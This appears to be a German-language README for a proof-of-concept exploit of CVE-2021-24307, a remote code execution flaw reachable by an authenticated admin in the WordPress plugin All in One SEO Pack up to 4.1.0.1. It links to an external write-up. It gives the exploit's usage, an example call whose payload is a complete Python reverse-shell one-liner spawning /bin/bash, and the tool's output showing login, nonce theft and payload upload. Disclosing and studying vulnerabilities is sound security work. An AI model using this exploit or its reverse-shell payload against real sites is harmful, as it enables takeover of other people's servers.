
Proof-of-Concept-Exploit für CVE-2021-24307, eine authentifizierte Admin-RCE in All in One SEO Pack <= 4.1.0.1 über PHP-Unserialisierung, die die Ausführung beliebiger Befehle ermöglicht.
Einfacher PoC einer authentifizierten RCE als Admin in AISEO <= 4.1.0.1, bereitgestellt als Beispiel.
Vollständiger Artikel hier: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/
Verwendung:
php exploit.php url login password php_command arguments [proxy]
Beispiel:
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080
-- All-in-one-seo-pack <= 4.1.0.1 authentifizierte Admin-RCE --
-- Exploit von Vincent MICHEL (@darkpills) --
[+] Authentifiziere bei wordpress http://wordpress/
[+] WP-REST-API-Nonce abrufen
[+] Nonce gefunden: 6aeb9ddf05
[+] POST-Payload wird generiert, um Befehl auszuführen: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] Lade INI-Datei mit Import-Einstellungen hoch
[+] Fertig! Prüfe das Ergebnis irgendwo (blinde Befehlsausführung)